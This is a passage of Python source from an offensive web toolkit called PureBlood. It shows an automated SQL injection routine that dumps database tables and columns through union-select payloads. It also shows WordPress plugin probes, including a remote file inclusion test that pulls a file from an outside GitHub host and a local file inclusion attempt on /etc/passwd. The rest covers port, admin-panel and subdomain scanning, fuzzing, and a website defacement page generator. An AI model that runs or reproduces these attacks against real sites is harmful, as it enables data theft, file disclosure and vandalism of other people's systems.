{0}'.format(sqli_uuid)) 1138 | print ('[+] Current System User: {0}'.format(sqli_system_user)) 1139 | print ('[+] Session User: {0}'.format(sqli_session_user)) 1140 | print ('[+] Is Sysmlink Enabled?: 
{0}'.format(sqli_symlink)) 1141 | print ('[+] Is SSL Enabled?: {0}'.format(sqli_ssl)) 1142 | print ('') 1143 | print ('[~] Dumping Database:') 1144 | auto_sql_injection_request_dios_soup_pureblood_list = [] 1145 | auto_sql_injection_request_dios_soup_pureblood = auto_sql_injection_request_dios_soup.findAll('strong', attrs={'id': 'PureBlood'}) 1146 | for i in auto_sql_injection_request_dios_soup_pureblood: 1147 | if i.text in auto_sql_injection_request_dios_soup_pureblood_list: 1148 | pass 1149 | else: 1150 | auto_sql_injection_request_dios_soup_pureblood_list.append(i.text) 1151 | for i in auto_sql_injection_request_dios_soup_pureblood_list: 1152 | print ('\t{0}'.format(i)) 1153 | print ('') 1154 | sqli_table = '' 1155 | user_choice = '' 1156 | sqli_column = [] 1157 | print ('{2}[{1}#{2}] {3}- {4}Just enter exit/done if you want to start dumping{0}'.format(reset + bold, green, blue, yellow, cyan)) 1158 | while True: 1159 | if sys.version_info[0] == 3: 1160 | if sqli_table: 1161 | pass 1162 | elif not sqli_table: 1163 | user_choice1 = str(input('Table> ')) 1164 | sqli_table = user_choice1 1165 | user_choice = str(input('\tColumn> ')) 1166 | if user_choice == 'done' or user_choice == 'exit' or user_choice == '': 1167 | break 1168 | else: 1169 | sqli_column.append(user_choice) 1170 | if sys.version_info[0] == 2: 1171 | if sqli_table: 1172 | pass 1173 | elif not sqli_table: 1174 | user_choice1 = str(raw_input('Table> ')) 1175 | sqli_table = user_choice1 1176 | user_choice = str(raw_input('\tColumn> ')) 1177 | if user_choice == 'done' or user_choice == 'exit' or user_choice == '': 1178 | break 1179 | else: 1180 | sqli_column.append(user_choice) 1181 | print ('') 1182 | print ('[~] Dumping Columns:') 1183 | for i in sqli_column: 1184 | auto_sql_injection_request_column_dump_list = [] 1185 | auto_sql_injection_request_column_dump_url = '{0}{1} /*!50000Union*/ all select {2} from {3}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii, sqli_table) 1186 | 
            auto_sql_injection_request_column_dump_url = auto_sql_injection_request_column_dump_url.replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_dump_column_payload + ',')
            auto_sql_injection_request_column_dump_url = auto_sql_injection_request_column_dump_url.replace('', i)
            auto_sql_injection_request_column_dump = requests.get(auto_sql_injection_request_column_dump_url)
            auto_sql_injection_request_column_dump_soup = BeautifulSoup(auto_sql_injection_request_column_dump.text, 'html.parser')
            auto_sql_injection_request_column_dump_soup_pureblood = auto_sql_injection_request_column_dump_soup.find_all('strong', attrs={'id': 'PureBloodINFO'})
            for ii in auto_sql_injection_request_column_dump_soup_pureblood:
                if ii.text in auto_sql_injection_request_column_dump_list:
                    pass
                elif ii.text not in auto_sql_injection_request_column_dump_list:
                    auto_sql_injection_request_column_dump_list.append(ii.text)
            for iii in auto_sql_injection_request_column_dump_list:
                print ('\t{0} -> {1}'.format(i, iii))

    def auto_xss_injection(self, xi_url):
        print ('')

    def wordpress_vulnerability_check(self, wvc_url):
        print ('[#] - Checking (WordPress Woocommerce - Directory Traversal):')
        wp_woocommerce_wvc_url = ''
        wp_woocommerce = requests.get(wvc_url + '/wp-content/plugins/woocommerce/templates/emails/plain')
        wp_woocommerce_wvc_url = wvc_url + '/wp-content/plugins/woocommerce/templates/emails/plain'
        if wp_woocommerce.status_code == 200:
            print ('\t[+] - Vulnerable! ~ ' + wp_woocommerce_wvc_url)
        elif wp_woocommerce.status_code == 301:
            print ('\t[!] - Redirected! ~ ' + wp_woocommerce_wvc_url)
        elif wp_woocommerce.status_code == 403:
            print ('\t[!] - Forbidden! ~ ' + wp_woocommerce_wvc_url)
        else:
            print ('\t[!] - 404 Found! ~ ' + wp_woocommerce_wvc_url)
        print ('\n\n[#] - Checking (Wordpress Plugin Booking Calendar 3.0.0 - SQL Injection / Cross-Site Scripting):')
        wp_plugin_booking_calendar_wvc_url = ''
        wp_plugin_booking_calendar = requests.get(wvc_url + '/BOOKING_WP/wp-content/plugins/wp-booking-calendar/public/ajax/getMonthCalendar.php')
        if wp_plugin_booking_calendar.status_code == 200:
            wp_plugin_booking_calendar = wp_plugin_booking_calendar
            wp_plugin_booking_calendar_wvc_url = wvc_url + '/BOOKING_WP/wp-content/plugins/wp-booking-calendar/public/ajax/getMonthCalendar.php'
        elif wp_plugin_booking_calendar.status_code == 404:
            wp_plugin_booking_calendar = requests.get(wvc_url + '/wp-content/plugins/wp-booking-calendar/public/ajax/getMonthCalendar.php')
            if wp_plugin_booking_calendar.status_code == 200:
                wp_plugin_booking_calendar = wp_plugin_booking_calendar
                wp_plugin_booking_calendar_wvc_url = wvc_url + '/wp-content/plugins/wp-booking-calendar/public/ajax/getMonthCalendar.php'
            else:
                wp_plugin_booking_calendar_wvc_url = wvc_url + '/wp-content/plugins/wp-booking-calendar/public/ajax/getMonthCalendar.php'
                wp_plugin_booking_calendar = 'Not Found'
        if wp_plugin_booking_calendar == 'Not Found':
            wp_plugin_booking_calendar_wvc_url = wvc_url + '/wp-content/plugins/wp-booking-calendar/public/ajax/getMonthCalendar.php'
            print ('\t[!] - 404 Found! ~ ' + wp_plugin_booking_calendar_wvc_url)
        else:
            print ('\t[+] - XSS Maybe Vulnerable! ~ ' + wp_plugin_booking_calendar_wvc_url + '?month=')
            print ('\t[+] - SQLMap Maybe Vulnerable! ~ ' + wp_plugin_booking_calendar_wvc_url + '?month=')
            print ('\t[+] - Unfortunately I can\'t handle alerts without using Selenium and you should manually use SQLMap. Try to do it manually')
        print ('\n\n[#] - Checking (WordPress Plugin WP with Spritz 1.0 - Remote File Inclusion):')
        wp_plugin_wp_spritz_wvc_url = ''
        wp_plugin_wp_spritz = requests.get(wvc_url + '/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php')
        if wp_plugin_wp_spritz.status_code == 200:
            wp_plugin_wp_spritz = requests.get(wvc_url + '/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?wvc_url=https://raw.githubusercontent.com/cr4shcod3/pureblood/master/l33t/rfi.txt')
            wp_plugin_wp_spritz_wvc_url = wvc_url + '/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?wvc_url=https://raw.githubusercontent.com/cr4shcod3/pureblood/master/l33t/rfi.txt'
            if 'PureBlood RFI ~Cr4sHCoD3' in wp_plugin_wp_spritz.text:
                print ('\t[+] - Vulnerable! ~ ' + wp_plugin_wp_spritz_wvc_url)
            wp_plugin_wp_spritz = requests.get(wvc_url + '/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?wvc_url=/etc/passwd')
            if wp_plugin_wp_spritz.status_code == 403 or wp_plugin_wp_spritz.status_code == 400:
                print ('\t[+] - Try to bypass LFI! ~ ' + wp_woocommerce_wvc_url)
            elif 'The page you are trying to access is restricted due to a security rule.' in wp_plugin_wp_spritz.text:
                print ('\t[+] - Try to bypass LFI! ~ ' + wp_woocommerce_wvc_url)
        elif wp_plugin_wp_spritz.status_code == 404:
            wp_plugin_wp_spritz_wvc_url = wvc_url + '/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php'
            print ('\t[!] - 404 Found! ~ ' + wp_plugin_wp_spritz_wvc_url)
        print ('\n\n[#] - Checking (WordPress Plugin Events Calendar - \'event_id\' SQL Injection):')
        wp_plugin_events_calendar_wvc_url = ''
        wp_plugin_events_calendar = requests.get(wvc_url + '/event.php?event_id=1')
        if wp_plugin_events_calendar.status_code == 200:
            wp_plugin_events_calendar_result = ''
            wp_plugin_events_calendar = requests.get(wvc_url + '/event.php?event_id=1\'')
            wp_plugin_events_calendar_wvc_url = wvc_url + '/event.php?event_id=1\''
            for db, errors in dbms_errors.items():
                for error in errors:
                    if re.compile(error).search(wp_plugin_events_calendar.text):
                        wp_plugin_events_calendar_result = 'Vulnerable'
                        print ('\t[+] - ' + db + ' Vulnerable! ~ ' + wp_plugin_events_calendar_wvc_url)
            if wp_plugin_events_calendar_result == '':
                print ('\t[!] - Not Vulnerable! ~ ' + wp_plugin_events_calendar_wvc_url)
        elif wp_plugin_events_calendar.status_code == 404:
            wp_plugin_events_calendar = requests.get(wvc_url + '/view-event.php?event_id=1')
            wp_plugin_events_calendar_wvc_url = wvc_url + '/view-event.php?event_id=1'
            if wp_plugin_events_calendar.status_code == 200:
                wp_plugin_events_calendar_result = ''
                wp_plugin_events_calendar = requests.get(wvc_url + '/view-event.php?event_id=1\'')
                wp_plugin_events_calendar_wvc_url = wvc_url + '/view-event.php?event_id=1\''
                for db, errors in dbms_errors.items():
                    for error in errors:
                        if re.compile(error).search(wp_plugin_events_calendar.text):
                            wp_plugin_events_calendar_result = 'Vulnerable'
                            print ('\t[+] - ' + db + ' Vulnerable! ~ ' + wp_plugin_events_calendar_wvc_url)
                if wp_plugin_events_calendar_result == '':
                    print ('\t[!] - Not Vulnerable! ~ ' + wp_plugin_events_calendar_wvc_url)
            elif wp_plugin_events_calendar.status_code == 404:
                print ('\t[!] - 404 Found! ~ ' + wp_plugin_events_calendar_wvc_url)



class WebPentest:
    def banner_grab(self, bg_url):
        try:
            banner_grab_request = requests.get(bg_url)
            banner_grab_result = banner_grab_request.headers
            banner_grab_result = str(banner_grab_result).replace("{'", "").replace("'}", "").replace("': '", ": ").replace("', '", ",\n")
            self.banner_grab_result = banner_grab_result
            return self.banner_grab_result
        except:
            print("Could not grab a banner info")

    def whois(self, w_url):
        try:
            whois_query = whois.whois(w_url)
            self.whois_result = whois_query
            return self.whois_result
        except:
            print("Could not perform whois")

    def traceroute(self, t_hostname):
        try:
            traceroute_request = requests.get('https://api.hackertarget.com/mtr/?q=' + t_hostname)
            traceroute_response = traceroute_request.text
            traceroute_final = """{0}""".format(str(traceroute_response))
            self.traceroute_result = traceroute_final
            return self.traceroute_result
        except:
            print("Could not perform traceroute")

    def dns_record(self, dr_hostname):
        try:
            dns_record_list = []
            for i in ids:
                t = threading.Thread(target=dns_record_scanner, args=(dr_hostname, i, dns_record_list, ))
                t.start()
                t.join()
            self.dns_record_result = dns_record_list
            return self.dns_record_result
        except:
            print("Could not find DNS record")

    def reverse_dns_lookup(self, rdl_ip):
        try:
            rdl_ip = rdl_ip + '/24'
            reverse_dns_lookup_request = requests.get('https://api.hackertarget.com/reversedns/?q=' + rdl_ip)
            reverse_dns_lookup_response = reverse_dns_lookup_request.text
            reverse_dns_lookup_final = """{0}""".format(str(reverse_dns_lookup_response))
            self.reverse_ip_lookup_result = reverse_dns_lookup_final
            return self.reverse_ip_lookup_result
        except:
            print("Could not perform dns reverse lookup")

    def zone_transfer_lookup(self, ztl_hostname):
        try:
            zone_transfer_lookup_request = requests.get('https://api.hackertarget.com/zonetransfer/?q=' + ztl_hostname)
            zone_transfer_lookup_response = zone_transfer_lookup_request.text
            zone_transfer_lookup_final = """{0}""".format(str(zone_transfer_lookup_response))
            self.zone_transfer_lookup_result = zone_transfer_lookup_final
            return self.zone_transfer_lookup_result
        except:
            print("Could not perform zone transfer lookup")

    def port_scan(self, ps_hostname, ps_pend): #https://stackoverflow.com/a/38210023
        port_scan_list = []
        threads = []
        output = {}
        delay = 10
        for i in range(ps_pend + 1):
            t = threading.Thread(target=TCP_connect, args=(ps_hostname, i, delay, output))
            threads.append(t)
        for i in range(ps_pend + 1):
            threads[i].start()
        for i in range(ps_pend + 1):
            threads[i].join()
        for i in range(ps_pend + 1):
            if output[i] == 'Open':
                port_scan_list.append('[+] Port Open - ' + str(i))
        self.port_scan_result = port_scan_list
        return self.port_scan_result

    def admin_panel_scan(self, ads_url):
        admin_panel_valid = []
        admin_panel_redirect = []
        ads_urls = []
        r_path = []
        ads_r_urls = []
        robots = ['/robot.txt', '/robots.txt']
        for i in admin_panel_list:
            ads_urls.append(ads_url + i)
        for i in robots:
            r_robots = requests.get(ads_url + i)
            if r_robots.status_code == 200:
                r_robots = r_robots
            else:
                r_robots = ''
        if r_robots == '':
            pass
        else:
            robots = str(r_robots.text)
            for i in robots.split("\n"):
                if i.startswith('Allow'):
                    r_path.append(i.split(': ')[1].split(' ')[0])
                elif i.startswith('Disallow'):
                    r_path.append(i.split(': ')[1].split(' ')[0])
            for i in r_path:
                ads_r_urls.append(ads_url + i)
            for i in ads_r_urls:
                ads_r_urls_request = requests.get(i)
                if 'Admin' in ads_r_urls_request.text or 'Login' in ads_r_urls_request.text:
                    r_admin_panel = i
                    admin_panel_valid.append(i)
                elif 'admin' in ads_r_urls_request.text or 'login' in ads_r_urls_request.text:
                    r_admin_panel = i
                    admin_panel_valid.append(i)
                elif 'Username' in ads_r_urls_request.text or 'Password' in ads_r_urls_request.text:
                    r_admin_panel = i
                    admin_panel_valid.append(i)
                elif 'username' in ads_r_urls_request.text or 'password' in ads_r_urls_request.text:
                    r_admin_panel = i
                    admin_panel_valid.append(i)
                else:
                    r_admin_panel = None
        if not admin_panel_valid:
            for i in ads_urls:
                admin_scan_request = requests.get(i)
                if admin_scan_request.status_code == 200:
                    admin_panel_valid.append(i)
                    break
                elif admin_scan_request.status_code == 301 or admin_scan_request.status_code == 302:
                    admin_panel_redirect.append(i)
                else:
                    pass
        admin_panel_valid = list(set(admin_panel_valid))
        for i in admin_panel_redirect:
            admin_panel_valid.append(i + ' - 301')
        if not admin_panel_valid:
            webbrowser.open_new_tab(google_hacking + 'site:' + ads_url + '+inurl:login | admin | user | cpanel | account | moderator | phpmyadmin | /cp')
        self.admin_panel_scan_result = admin_panel_valid
        return self.admin_panel_scan_result

    def subdomain_scan(self, ss_hostname, subdomain_list):
        so_200 = []
        so_301 = []
        so_302 = []
        so_403 = []
        ss_urls = []
        ss_subdomain_list = open(subdomain_list, 'r')
        ss_subdomain_list = ss_subdomain_list.read().splitlines()
        for i in ss_subdomain_list:
            ss_urls.append(i + '.' + ss_hostname)
        for i in ss_urls:
            t = threading.Thread(target=subdomain_scanner, args=(i, so_200, so_301, so_302, so_403,))
            t.start()
            t.join()
        self.ss_200_result = so_200
        self.ss_301_result = so_301
        self.ss_302_result = so_302
        self.ss_403_result = so_403
        return self.ss_200_result, self.ss_301_result, self.ss_302_result, self.ss_403_result

    def cms_detect(self, cd_hostname):
        cd_cms = []
        cd_cms_version = []
        cms_detect_request = requests.get('https://whatcms.org/?s=' + cd_hostname)
        cd_soup = BeautifulSoup(cms_detect_request.content, 'html.parser')
        cd_soup_div = cd_soup.find('div', attrs={'class': 'large text-center'})
        for i in cd_soup_div.find_all('span', attrs={'class': 'nowrap'}):
            cd_cms_version.append(i.text)
        cd_cms.append(cd_soup_div.find('a').text)
        if not cd_cms:
            cms_detect_final = '[!] - There\'s no CMS Detected!'
        else:
            cd_cms_version = cd_cms_version[1]
            cms_detect_final = cd_cms[0].replace('/c/', '')
            cms_detect_final = cms_detect_final + ' - ' + cd_cms_version
        self.cms_detect_result = cms_detect_final
        return self.cms_detect_result

    def reverse_ip_lookup(self, ril_hostname):
        reverse_ip_lookup_request = requests.get('https://api.hackertarget.com/reverseiplookup/?q=' + ril_hostname)
        reverse_ip_lookup_response = reverse_ip_lookup_request.text
        reverse_ip_lookup_final = """{0}""".format(str(reverse_ip_lookup_response))
        self.reverse_ip_lookup_result = reverse_ip_lookup_final
        return self.reverse_ip_lookup_result

    def subnet_lookup(self, subnet_input):
        subnet_lookup_request = requests.get('https://api.hackertarget.com/subnetcalc/?q=' + subnet_input)
        subnet_lookup_response = subnet_lookup_request.text
        subnet_lookup_final = """{0}""".format(str(subnet_lookup_response))
        self.subnet_lookup_result = subnet_lookup_final
        return self.subnet_lookup_result

    def links_extract(self, le_url):
        links_extract_request = requests.get('https://api.hackertarget.com/pagelinks/?q=' + le_url)
        links_extract_response = links_extract_request.text
        links_extract_final = """{0}""".format(str(links_extract_response))
        self.links_extract_result = links_extract_final
        return self.links_extract_result

    def directory_fuzz(self, df_url, directory_list):
        directory_fuzz_final1 = []
        directory_fuzz_final2 = []
        directory_fuzz_final3 = []
        directory_list_open = open(directory_list, 'r')
        directory_list = directory_list_open.read().splitlines()
        df_url_list = []
        ii = 0
        for i in directory_list:
            if '/' in directory_list[ii]:
                df_url_list.append(df_url + i)
            else:
                df_url_list.append(df_url + '/' + i)
            ii = ii + 1
        for i in df_url_list:
            print (i)
            t = threading.Thread(target=directory_scanner, args=(i, directory_fuzz_final1, directory_fuzz_final2, directory_fuzz_final3))
            t.start()
            t.join()
        self.directory_fuzz_result1 = directory_fuzz_final1
        self.directory_fuzz_result2 = directory_fuzz_final2
        self.directory_fuzz_result3 = directory_fuzz_final3
        return self.directory_fuzz_result1, self.directory_fuzz_result2, self.directory_fuzz_result3

    def file_fuzz(self, ff_url, file_list):
        file_fuzz_final1 = []
        file_fuzz_final2 = []
        file_fuzz_final3 = []
        file_list_open = open(file_list, 'r')
        file_list = file_list_open.read().splitlines()
        ff_url_list = []
        for i in file_list:
            ff_url_list.append(ff_url + '/' + i)
        for i in ff_url_list:
            t = threading.Thread(target=file_scanner, args=(i, file_fuzz_final1, file_fuzz_final2, file_fuzz_final3))
            t.start()
            t.join()
        self.file_fuzz_result1 = file_fuzz_final1
        self.file_fuzz_result2 = file_fuzz_final2
        self.file_fuzz_result3 = file_fuzz_final3
        return self.file_fuzz_result1, self.file_fuzz_result2, self.file_fuzz_result3

    def shodan_search(self, query, ss_SHODAN_API_KEY):
        shodan_api = shodan.Shodan(ss_SHODAN_API_KEY)
        try:
            shodan_search_results = shodan_api.search(query)
            self.shodan_search_result = shodan_search_results
            return self.shodan_search_result
        except shodan.APIError as e:
            print ('[!] - Error: {0}'.format(e))
            time.sleep(2)
            web_pentest()

    def shodan_host_lookup(self, shodan_host, shl_SHODAN_API_KEY):
        shodan_api = shodan.Shodan(shl_SHODAN_API_KEY)
        try:
            shodan_host_lookup_results = shodan_api.host(shodan_host)
            self.shodan_host_lookup_result = shodan_host_lookup_results
            return self.shodan_host_lookup_result
        except shodan.APIError as e:
            print ('[!] - Error: {0}'.format(e))
            time.sleep(2)
            web_pentest()



def create_directories():
    if not os.path.exists('outputs'):
        os.mkdir('outputs')
    else:
        pass
    if not os.path.exists('outputs/generator'):
        os.mkdir('outputs/generator')
    else:
        pass
    if not os.path.exists('outputs/web_pentest'):
        os.mkdir('outputs/web_pentest')
    else:
        pass
    if not os.path.exists('outputs/web_pentest/shodan'):
        os.mkdir('outputs/web_pentest/shodan')
    else:
        pass
    if not os.path.exists('outputs/web_application_attack'):
        os.mkdir('outputs/web_application_attack')
    else:
        pass
    if not os.path.exists('external'):
        os.mkdir('external')
    else:
        pass



def clear():
    if platform.system() == 'Linux':
        os.system('clear')
    elif platform.system() == 'Windows':
        os.system('cls')
    elif platform.system() == 'Darwin':
        os.system('clear')
    else:
        os.system('clear')



def banner():
    try:
        if sys.version_info[0] == 3:
            banner = ("""{1}
██▓███ █ ██ ██▀███ ▓█████ ▄▄▄▄ ██▓ ▒█████ ▒█████ ▓█████▄
▓██░ ██▒ ██ ▓██▒▓██ ▒ ██▒▓█ ▀ ▓█████▄ ▓██▒ ▒██▒ ██▒▒██▒ ██▒▒██▀ ██▌
▓██░ ██▓▒▓██ ▒██░▓██ ░▄█ ▒▒███ ▒██▒ ▄██▒██░ ▒██░ ██▒▒██░ ██▒░██ █▌
▒██▄█▓▒ ▒▓▓█ ░██░▒██▀▀█▄ ▒▓█ ▄ ▒██░█▀ ▒██░ ▒██ ██░▒██ ██░░▓█▄ ▌
▒██▒ ░ ░▒▒█████▓ ░██▓ ▒██▒░▒████▒░▓█ ▀█▓░██████▒░ ████▓▒░░ ████▓▒░░▒████▓
▒▓▒░ ░ ░░▒▓▒ ▒ ▒ ░ ▒▓ ░▒▓░░░ ▒░ ░░▒▓███▀▒░ ▒░▓ ░░ ▒░▒░▒░ ░ ▒░▒░▒░ ▒▒▓ ▒
░▒ ░ ░░▒░ ░ ░ ░▒ ░ ▒░ ░ ░ ░▒░▒ ░ ░ ░ ▒ ░ ░ ▒ ▒░ ░ ▒ ▒░ ░ ▒ ▒
░░ ░░░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ▒ ░ ░ ░
░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
░ ░

{2}--={3}[ {0}{5}Author: Cr4sHCoD3 {3}]{2}=--
{4}| {2}-- --={3}[ {0}{5}Version: 2 {3}]{2}=-- -- {4}|
| {2}-- --={3}[ {0}{5}Website: https://github.com/cr4shcod3 {3}]{2}=-- -- {4}|
| {2}-- --={3}[ {0}{5}PureHackers ~ Blood Security Hackers {3}]{2}=-- -- {4}|
{0}


""".format(reset, red, green, blue, yellow, bold))
        elif sys.version_info[0] == 2:
            banner = ("""{1}
██▓███ █ ██ ██▀███ ▓█████ ▄▄▄▄ ██▓ ▒█████ ▒█████ ▓█████▄
▓██░ ██▒ ██ ▓██▒▓██ ▒ ██▒▓█ ▀ ▓█████▄ ▓██▒ ▒██▒ ██▒▒██▒ ██▒▒██▀ ██▌
▓██░ ██▓▒▓██ ▒██░▓██ ░▄█ ▒▒███ ▒██▒ ▄██▒██░ ▒██░ ██▒▒██░ ██▒░██ █▌
▒██▄█▓▒ ▒▓▓█ ░██░▒██▀▀█▄ ▒▓█ ▄ ▒██░█▀ ▒██░ ▒██ ██░▒██ ██░░▓█▄ ▌
▒██▒ ░ ░▒▒█████▓ ░██▓ ▒██▒░▒████▒░▓█ ▀█▓░██████▒░ ████▓▒░░ ████▓▒░░▒████▓
▒▓▒░ ░ ░░▒▓▒ ▒ ▒ ░ ▒▓ ░▒▓░░░ ▒░ ░░▒▓███▀▒░ ▒░▓ ░░ ▒░▒░▒░ ░ ▒░▒░▒░ ▒▒▓ ▒
░▒ ░ ░░▒░ ░ ░ ░▒ ░ ▒░ ░ ░ ░▒░▒ ░ ░ ░ ▒ ░ ░ ▒ ▒░ ░ ▒ ▒░ ░ ▒ ▒
░░ ░░░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ▒ ░ ░ ░
░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
░ ░

{2}--={3}[ {0}{5}Author: Cr4sHCoD3 {3}]{2}=--
{4}| {2}-- --={3}[ {0}{5}Version: 2 {3}]{2}=-- -- {4}|
| {2}-- --={3}[ {0}{5}Website: https://github.com/cr4shcod3 {3}]{2}=-- -- {4}|
| {2}-- --={3}[ {0}{5}PureHackers ~ Blood Security Hackers {3}]{2}=-- -- {4}|
{0}


""".format(reset, red, green, blue, yellow, bold)).decode('utf-8')
        print (banner)
    except:
        if sys.version_info[0] == 3:
            banner = ("""{1}
o--o o--o o o
| | | | | |
O--o o o o-o o-o O--o | o-o o-o o-O
| | | | |-' | | | | | | | | |
o o--o o o-o o--o o o-o o-o o-o

{2}--={3}[ {0}{5}Author: Cr4sHCoD3 {3}]{2}=--
{4}| {2}-- --={3}[ {0}{5}Version: 2 {3}]{2}=-- -- {4}|
| {2}-- --={3}[ {0}{5}Website: https://github.com/cr4shcod3 {3}]{2}=-- -- {4}|
| {2}-- --={3}[ {0}{5}PureHackers ~ Blood Security Hackers {3}]{2}=-- -- {4}|
{0}


""".format(reset, red, green, blue, yellow, bold))
        elif sys.version_info[0] == 2:
            banner = ("""{1}
o--o o--o o o
| | | | | |
O--o o o o-o o-o O--o | o-o o-o o-O
| | | | |-' | | | | | | | | |
o o--o o o-o o--o o o-o o-o o-o

{2}--={3}[ {0}{5}Author: Cr4sHCoD3 {3}]{2}=--
{4}| {2}-- --={3}[ {0}{5}Version: 2 {3}]{2}=-- -- {4}|
| {2}-- --={3}[ {0}{5}Website: https://github.com/cr4shcod3 {3}]{2}=-- -- {4}|
| {2}-- --={3}[ {0}{5}PureHackers ~ Blood Security Hackers {3}]{2}=-- -- {4}|
{0}


""".format(reset, red, green, blue, yellow, bold)).decode('utf-8')
        print (banner)



def set_target(target, wfunc):
    global url
    global hostname
    global ip
    if '=' in target and wfunc != 2:
        target = urlparse(target)
        if target.scheme == '':
            target = ('{0}'.format(target.netloc))
        else:
            target = ('{0}://{1}'.format(target.scheme, target.netloc))
    if 'http://' in target:
        url = target
        hostname = target.replace('http://', '')
    elif 'https://' in target:
        url = target
        hostname = target.replace('https://', '')
    if '://' not in target:
        url = 'http://' + target
        hostname = target
    if '1' == target[0] or '2' == target[0] or '3' == target[0] or '4' == target[0] or '5' == target[0] or '6' == target[0] or '7' == target[0] or '8' == target[0] or '9' == target[0]:
        ip = target
    if wfunc == 2:
        pass
    else:
        ip = socket.gethostbyname(hostname)
    if wfunc == 1:
        web_pentest()
    elif wfunc == 2:
        web_application_attack()
    else:
        main()



def generator():
    print ("""{3}[ {5}Generator {3}]

{2}01{3}) {5}Deface Page Generator
{2}02{3}) {5}Password Generator
{2}03{3}) {5}PLDT WiFi Password Calculator
{2}04{3}) {5}Text To Hash
{2}90{3}) {5}Back To Menu
{2}99{3}) {5}Exit
{0}""".format(reset, red, green, blue, yellow, cyan))
    if sys.version_info[0] == 3:
        try:
            choice = int(input('{0}PureBlood{1}({3}Generator{1})> {2}'.format(green, blue, cyan, red)))
        except KeyboardInterrupt:
            print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
            sys.exit()
        except ValueError:
            print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid number!{0}'.format(reset, red, blue, yellow))
            time.sleep(2)
            print ('')
            generator()
    elif sys.version_info[0] == 2:
        try:
            choice = int(raw_input('{0}PureBlood{1}({3}Generator{1})> {2}'.format(green, blue, cyan, red)))
        except KeyboardInterrupt:
            print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
            sys.exit()
        except ValueError:
            print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid number!{0}'.format(reset, red, blue, yellow))
            time.sleep(2)
            print ('')
            generator()
    cgenerator = Generator()
    if choice == 1:
        print ('{0}='.format(red) * int(sizex))
        print (reset + bold)
        if sys.version_info[0] == 3:
            title = str(input('{0}PureBlood{1}>{0}Generator{1}>({3}Title{1})> {2}'.format(green, blue, cyan, red)))
            shortcut_icon = str(input('{0}PureBlood{1}>{0}Generator{1}>({3}Shortcut Icon{1})> {2}'.format(green, blue, cyan, red)))
            meta_description = str(input('{0}PureBlood{1}>{0}Generator{1}>({3}Meta Description{1})> {2}'.format(green, blue, cyan, red)))
            meta_image = str(input('{0}PureBlood{1}>{0}Generator{1}>({3}Meta Image{1})> {2}'.format(green, blue, cyan, red)))
            logo = str(input('{0}PureBlood{1}>{0}Generator{1}>({3}Logo{1})> {2}'.format(green, blue, cyan, red)))
            hacker_name = str(input('{0}PureBlood{1}>{0}Generator{1}>({3}Hacker Name{1})> {2}'.format(green, blue, cyan, red)))
            message1 = str(input('{0}PureBlood{1}>{0}Generator{1}>({3}Message 1{1})> {2}'.format(green, blue, cyan, red)))
            message2 = str(input('{0}PureBlood{1}>{0}Generator{1}>({3}Message 2{1})> {2}'.format(green, blue, cyan, red)))
            groups = str(input('{0}PureBlood{1}>{0}Generator{1}>({3}Group/s{1})> {2}'.format(green, blue, cyan, red)))
            deface_page_output_filename = str(input('{0}PureBlood{1}>{0}Generator{1}>({3}Output Filename{1})> {2}'.format(green, blue, cyan, red)))
        if sys.version_info[0] == 2:
            title = str(raw_input('{0}PureBlood{1}>{0}Generator{1}>({3}Title{1})> {2}'.format(green, blue, cyan, red)))
            shortcut_icon = str(raw_input('{0}PureBlood{1}>{0}Generator{1}>({3}Shortcut Icon{1})> {2}'.format(green, blue, cyan, red)))
            meta_description = str(raw_input('{0}PureBlood{1}>{0}Generator{1}>({3}Meta Description{1})> {2}'.format(green, blue, cyan, red)))
            meta_image = str(raw_input('{0}PureBlood{1}>{0}Generator{1}>({3}Meta Image{1})> {2}'.format(green, blue, cyan, red)))
            logo = str(raw_input('{0}PureBlood{1}>{0}Generator{1}>({3}Logo{1})> {2}'.format(green, blue, cyan, red)))
            hacker_name = str(raw_input('{0}PureBlood{1}>{0}Generator{1}>({3}Hacker Name{1})> {2}'.format(green, blue, cyan, red)))
            message1 = str(raw_input('{0}PureBlood{1}>{0}Generator{1}>({3}Message 1{1})> {2}'.format(green, blue, cyan, red)))
            message2 = str(raw_input('{0}PureBlood{1}>{0}Generator{1}>({3}Message 2{1})> {2}'.format(green, blue, cyan, red)))
            groups = str(raw_input('{0}PureBlood{1}>{0}Generator{1}>({3}Group/s{1})> {2}'.format(green, blue, cyan, red)))
            deface_page_output_filename = str(raw_input('{0}PureBlood{1}>{0}Generator{1}>({3}Output Filename{1})> {2}'.format(green, blue, cyan, red)))
        gdeface_page = cgenerator.deface_page(title, shortcut_icon, meta_description, meta_image, logo, hacker_name, message1, message2, groups)
        if '.html' in deface_page_output_filename:
            deface_page_output_filename = deface_page_output_filename
        else:
            deface_page_output_filename = deface_page_output_filename + '.html'
        deface_page_output_file = open('outputs/generator/' + deface_page_output_filename, 'w+')
        deface_page_output_file.write(gdeface_page)
        deface_page_output_file.close()
        print ('\nOutput saved in outputs/generator/' + deface_page_output_filename + '{0}')
        print (reset + bold)
        print ('{0}='.format(red) * int(sizex))
        generator()
    elif choice == 2:
        if sys.version_info[0] == 3:
            length = int(input('{0}PureBlood{1}>{0}Generator{1}>{0}PasswordGenerator{1}>({3}Length{1})> {2}'.format(green, blue, cyan, red)))
            text = str(input('{0}PureBlood{1}>{0}Generator{1}>{0}PasswordGenerator{1}>({3}Text{1})> {2}'.format(green, blue, cyan, red)))
        if sys.version_info[0] == 2:
            length = int(raw_input('{0}PureBlood{1}>{0}Generator{1}>{0}PasswordGenerator{1}>({3}Length{1})> {2}'.format(green, blue, cyan, red)))
